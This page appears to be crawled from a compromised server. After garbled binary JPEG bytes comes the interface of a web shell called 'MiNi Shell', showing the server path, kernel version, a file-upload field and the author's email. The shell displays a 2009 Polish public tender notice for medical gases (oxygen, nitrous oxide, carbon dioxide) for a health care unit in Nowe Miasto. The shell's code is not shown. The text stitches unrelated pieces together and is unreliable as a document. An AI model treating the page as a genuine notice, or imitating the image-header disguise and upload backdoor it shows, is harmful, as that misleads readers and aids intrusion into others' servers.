JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091006/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091006/169975-N-2009.html

<p class="kh_header"><b>Nowe Miasto: Gazy medyczne Nr. sprawy ZP, PN( 10)  2009 . Nie otwierać przed dniem   19.10. 2009 r godz. 10 00 .</b><br>
<b>Numer ogłoszenia: 169975 - 2009; data zamieszczenia: 06.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Tomaszowska 43, 26-420 Nowe Miasto, woj. mazowieckie, tel. 048 6743842, faks 048 6740040.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoz-nowemiasto.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Gazy medyczne Nr. sprawy ZP, PN( 10)  2009 . Nie otwierać przed dniem   19.10. 2009 r godz. 10 00 ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1 Przedmiotem zamówienia jest zakup i dostawa  Gazów medycznych wraz z 
   dzierżawą Odgazowywacza tlenowego jak i wymienionych poniżej butli w 
   postaci :
       a)Tlenu medycznego ciekłego  oznaczenie wg  Wspólnego Słownika 
          Zamówień : Kod CPV  24111900-4 w ilości 37.800,0 kg;
       b)Tlenu medycznego w butlach oznaczenie wg  Wspólnego Słownika 
          Zamówień : Kod CPV 24111900-4 w ilości 870 m3;
      c)Podtlenku azotu w butlach oznaczenie wg  Wspólnego Słownika Zamówień : 
         Kod CPV 24111000-5 w ilosci 675 kg;
      d)Dwutlenku węgla w butlach  oznaczenie wg  Wspólnego Słownika 
        Zamówień : Kod CPV 24111500-0 w ilości 135 kg.
 2.Dostawy gazów medycznych odbywać się będą sukcesywnie przez cały okres 
    trwania umowy  mianowicie: 
   1)Tlenu medycznego w ;
     - butlach 40 litrowych  w zależności od potrzeb; 
     - butlach 10  i 3 litrowych  jeden lub dwa razy na kwartał ;
     - ciekłego ( w Odgazowywaczu 1050 kg) jeden lub dwa razy w miesiącu.
   2)Dwutlenek węgla w ;
     - butle 10 litrowych (7,5 kg) jeden  raz w miesiącu lub w zależności od potrzeb.
   3)Podtlenek azotu w ;
     - butlach 10 litrowych ( 7 kg) jeden raz w kwartale lub w zależności od potrzeb
3.Opis  przedmiotu zamówienia wymienionego w poz.3.1.1.  i jego minimalna- 
   gwarantowana ilość została określona w formularzu (oferta-cenowa) - załączniki 
   nr 4 SIWZ.
   1)Przewidywane ilość przedmiotu zamówienia oszacowano na podstawie danych 
      zużycia z lat ubiegłych oraz najlepszej wiedzy zamawiającego co do potrzeb w 
      okresie realizacji zamówienia.
4.Zamawiający zastrzega sobie prawo do zmniejszenia lub zwiększenia w trakcie 
   realizacji umowy ilości zakresu opisanego przedmiotu zamówienia  w granicach  +
   10 %.  
  1)W przypadku zmniejszenia  ilości przedmiotu zamówienia  wykonawcy będzie 
     przysługiwać wynagrodzenie wynikające ze zrealizowanych dostaw  po cenie 
     zaoferowanej w ofercie.
  2) W przypadku zwiększenia ilości przedmiotu zamówienia wykonawcy 
      przysługiwać będzie zwiększone wynagrodzenie przedmiotu zamówienia po 
      cenach obowiązujących .
5.Przedmiot zamówienia  występuje jako jedno zadanie i jest niepodzielny.
6.Zamawiający nie dopuszcza  składanie ofert częściowych.  
7.Zamawiający nie dopuszcza składanie ofert wariantowych i drogą elektroniczną , o których mowa w art.36 ust.2 pkt 4 i pkt 5 ustawy.
8.Zamawiający  nie przewiduje zamówień uzupełniających ,o których mowa w art 67 ust 1 pkt 7 ustawy oraz podpisania umowy ramowej. 
9.Jeden wykonawca może  złożyć tylko jedną ofertę..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 24.00.00.00-4, 24.11.19.00-4, 24.11.22.00-4, 24.11.15.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie zamówienia mogą ubiegać się wykonawcy będący osobami 
  fizycznymi, osobami  prawnymi lub jednostkami organizacyjnymi nie posiadającymi 
  osobowości prawnej, a także  wykonawcy ci występujący wspólnie spełniający 
  warunki określone w art 22 ust 1 pkt1-4, ustawy z dnia 29 stycznia 2004 r oraz 
  Specyfikacji Istotnych Warunków Zamówienia szczególności : 
     1) posiadają uprawnienia do wykonywania działalności  lub czynności określonej 
        przedmiotem zamówienia, jeżeli ustawy nakładają posiadania takich 
        uprawnień oraz udokumentują to poprzez wykazanie posiadania  uprawnień 
        do wykonywania działalności związanej z przedmiotem niniejszego zamówienia 
        publicznego,
     2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem 
        technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią 
         pisemne zobowiązanie innych przedmiotów do udostępnienia potencjału 
         technicznego i osób zdolnych do wykonania zamówienia oraz udokumentują 
         to poprzez wykazanie realizacji przynajmniej dwóch dostaw  
         odpowiadających swoim rodzajem oraz wartością dostawom   stanowiącym 
         przedmiot zamówienia,
     3) znajdują sie w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
        zamówienia,
     4) nie podlegają wykluczeniu  z postępowania o udzielenie zamówienia oraz 
        udokumentują to poprzez złożenie oświadczeń aktualnych dokumentów , 
        informacji potwierdzających, że Wykonawca nie podlega wykluczeniu z 
        postępowania o udzielenie zamówienia publicznego . 
  2.Opis sposobu dokonania oceny spełnienia wymaganych warunków .
      Sprawdzenie wymaganych warunków udziału w postępowaniu odbywać się 
      będzie na podstawie przedłożonych przez Wykonawcę wraz z ofertą 
      dokumentów i oświadczeń  potwierdzających spełnienie warunków w 
      postępowaniu i wymaganych przez Zamawiającego w niniejszej SIWZ
      zgodnie z  formułą (spełnia  -  nie spełnia)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Wraz ze złożoną ofertą wypełnioną na Formularzu ofertowym wg. wzoru 
   określonego w   załączniku nr 3. do SIWZ należy załączyć:
    a)Wypełniony i podpisany formularz (oferta cenowa) wg. wzoru określonego w 
       załączniku  nr 4 do SIWZ   
    b)Oświadczenie, że Wykonawca  spełnienia wymagania wynikające z  art. 22 ust 
       1 ustawy i nie podlega wykluczeniu na podstawie art. 24 ust 1 i  2 ustawy 
         wg. wzoru określonego w załączniku  nr 1 i 2 SIWZ  ( w przypadku 
         konsorcjum oświadczenie zawarte w art.22 ust 1 pkt 1-3 składane jest 
         wspólnie ,a pkt 4 musi złożyć każdy wykonawca  z osobna).
2.W celu potwierdzenia posiadania uprawnień  do wykonywania  działalności 
   określonej przedmiotem zmówienia  lub czynności wykonawcy winni złożyć 
   następujące dokumenty :
    a)Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do
       ewidencji o   działalności gospodarczej ,jeżeli odrębne  przepisy wymagają 
       wpisu do rejestru lub zgłoszenia do ewidencji o działalności  gospodarczej   
       wystawione nie wcześniej niż 6 m-cy  przed upływem terminu składania ofert; 
      ( w przypadku konsorcjum ubiegającego się o zamówienia ,każdy z 
       wykonawców jest zobowiązany złożyć ten dokument).
b)dla przedmiotu oferty kwalifikowanego jako wyrób medyczny - oryginał lub 
   kserokopię Rejestru produktu zamówienia i podmiotu odpowiedzialnego z za jego  
   wprowadzenie do obrotu wydanego przez Prezesa Urzędu Rejestracji Produktów 
   Leczniczych,  Wyrobów Medycznych i Produktów Biobójczych  lub złożenia 
   kserokopii zgłoszenia przedmiotu zamówienia do Rejestru Wyrobów Medycznych 
   zgodnie z ustawą,  lub inne równoważne dokumenty, które potwierdziłyby  
   zgodnie z obowiązującymi  przepisami jakość produktu ;
        - w sytuacji gdy odpowiednie przepisy prawa wymagają, by potwierdzenie 
          spełniania norm czy wymogów jakościowych wydane było w ściśle 
          określonej formie, jej zachowanie jest konieczne.
     c)Zezwolenie na prowadzenie i wytwarzanie środka farmaceutycznego jakim 
        jest przedmiot zamówienia oraz hurtowni farmaceutycznej zgodnie z ustawą 
        Prawo farmaceutyczne (Dz. U. z 2004 r Nr 53 poz 533 ze zm) .
     d)Aktualne karty charakterystyki substancji niebezpiecznej i preparatu 
        niebezpiecznego zgodnie z rozporządzeniem Ministra Zdrowia z dnia 3 lipca 
        2002 r w sprawie karty charakterystyki (Dz.U. Nr 140 poz.1171 ze zm.)
     e)Dokument potwierdzający uprawnienie osoby do występowania w imieniu 
        Wykonawcy (np. pełnomocnictwo do reprezentowania o ile ofertę składa 
        pełnomocnik ,uchwałę wspólników spółki, konsorcjum) o ile wynika to z 
        załączonych dokumentów.Pełnomocnictwo powinno być złożone w formie 
        oryginału lub kopii sporządzonej notarialnie. 
3.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium 
   Rzeczypospolitej Polskiej, stosuje się do przepisów   zawartych w Rozporządzeniu
   Prezesa Rady Ministrów z dnia 19 maja 2008 r w sprawie rodzajów dokumentów 
   jakich może żądać zamawiający od wykonawcy oraz  form w jakich dokumenty 
   powinny być składane ( Dz. U. Nr 188 poz.1155)- składa: 
      - aktualny dokument wystawiony w kraju, w którym ma siedzibę lub miejsce 
        zamieszkania, potwierdzający, że nie otwarto jego likwidacji ,ani nie 
        ogłoszono upadłości: jeśli w kraju  pochodzenia osoby lub w kraju,w którym 
        wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się takiego 
        dokumentu;
      - dokument zawierający oświadczenie złożone przed notariuszem,właściwym 
        organem sądowym, administracyjnym albo organem samorządu zawodowego 
        osoby lub kraju, w którym  wykonawca ma siedzibę lub miejsce
        zamieszkania;   
4.W celu potwierdzenia ,że wykonawca posiada niezbędną wiedzę i 
   doświadczenie,oraz dysponuje potencjałem technicznym i dysponuje osobami 
   zdolnymi do wykonania zamówienia , zamawiający wymaga : 
     a)wykazu wykonanych  w okresie nie dłuższym niż ostatnie trzy lata dostaw 
        odpowiadających swoim rodzajem oraz wartością dostawom  stanowiącym 
        przedmiot zamówienia , z podaniem ich wartości ,przedmiotu ,dat wykonania i
        odbiorców - załącznik  nr 6 do SIWZ . Na potwierdzenie niezbędnej wiedzy i 
        doświadczenia  Wykonawcy winni wykazać ,że w ciągu ostatnich trzech lat
        wykonali co najmniej dwie dostawy w zakresie przedmiotu zamówienia 
        odpowiadające wartością i zakresem niniejszemu zamówieniu. Do wykazu 
         należy załączyć  dokumenty potwierdzające ,że dostawy  zostały należycie 
         wykonane ( w przypadku konsorcjum przynajmniej jeden członek 
         konsorcjum).
5.W celu potwierdzenia ,że wykonawca  znajduje się w sytuacji ekonomicznej i 
  finansowej zapewniającej wykonanie zamówienia, zamawiający wymaga złożenia :
    a)ważnej kserokopii polisy ubezpieczeniowej , a w przypadku jej braku innego 
       dokumentu   ubezpieczenia potwierdzającego, że wykonawca jest 
       ubezpieczony od odpowiedzialności cywilnej     w zakresie  prowadzonej 
       działalności gospodarczej w tym w zakresie przedmiotu zamówienia ( w   
       przypadku konsorcjum każdy członek konsorcjum składa oddzielnie) .
6.Dokumenty, są składane w formie  oryginału, wypisu , odpisu lub kopii w języku
  polskim lub  przetłumaczone przez tłumaczy przysięgłych na język polski, 
  stosownie do obowiązujących  przepisów.
7.Kserokopie dokumentów powinny być czytelne i potwierdzone za zgodność z 
   oryginałem przez  wykonawcę lub osoby (ę) uprawnione (ą) do składania 
   oświadczeń woli w imieniu wykonawcy.


WARUNKI UMOWY
1.Zamawiający podpisze umowę z wykonawcą, który przedłoży najkorzystniejszą 
  ofertę z   punktu widzenia kryteriów przyjętych w niniejszej SIWZ z 
  uwzględnieniem danych zawartych w  całej ofercie , zaakceptuje projekt umowy i 
  postanowienia w nim zawarte .
2.Na podstawie art. 144 ust. 1 ustawy Zamawiający przewiduje możliwość 
  dokonywania zmian postanowień zawartej umowy w stosunku do treści oferty w 
  następujących przypadkach:
1.Dopuszcza się zmianę umowy w zakresie przedmiotowym tj. zastąpienie produktu
   objętego umową odpowiednikiem w przypadku: 
   a)zaprzestania wytwarzania produktu objętego umową ,
   b)wygaśnięcia świadectwa rejestracji 
 1)Zmiana, o której mowa w ust. 1 będzie dopuszczalna pod warunkiem, iż 
    odpowiednik przy tej  samej cenie będzie kompatybilny z warunkami opisanego 
    produktu.
 2)Zmiany, o których mowa wyżej mogą dotyczyć nadto sposobu konfekcjonowania
    produktu i   wielkości jednostkowej opakowania.
 3)Jeżeli Wykonawca dostarczający przedmiot zamówienia zmienił dane firmy (np. 
    w  wyniku przekształceń, przejęć itp.) możliwe jest sporządzenie aneksu do 
    umowy zmieniającego dane firmy.
 4)W przypadku zmiany obowiązujących przepisów prawnych mających 
    zastosowanie przy udzielaniu zamówień publicznych, treść umowy będzie 
    zmieniała się stosownie do wprowadzonych rozwiązań  prawnych.
 5)W przypadku, gdy nastąpiła zmiana stawki podatku VAT cena netto nie ulegnie 
    zmianie, nastąpi jedynie zmiana ceny brutto 
 6)W przypadku zmiany wskaźnika wzrostu cen  i usług konsumpcyjnych 
    ogłoszonego  przez Główny Urząd Statystyczny cena ulegnie zmianie o wielkość 
    tegoż wskaźnika.
 2.W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie 
   umowy nie leży w interesie publicznym, czego nie można było przewidzieć w 
   chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni 
   od powzięcia wiadomości o tych okolicznościach. W takim przypadku Wykonawca 
   może żądać jedynie wynagrodzenia należnego mu z tytułu wykonania części umowy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zoz-nowemiasto.net.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SP ZOZ 26-420 Nowe-Miasto n/P ul.Tomaszowska 43 po wpłaceniu kwoty 30 zł przelewem na konto Bank Spółdzielczy Belsk Duży 75 9116 0001 0001 4616 2000 0001.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2009 godzina 09:30, miejsce: SP ZOZ 26-420 Nowe-Miasto n/P ul. Tomaszowska 43 -budynek administracji (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com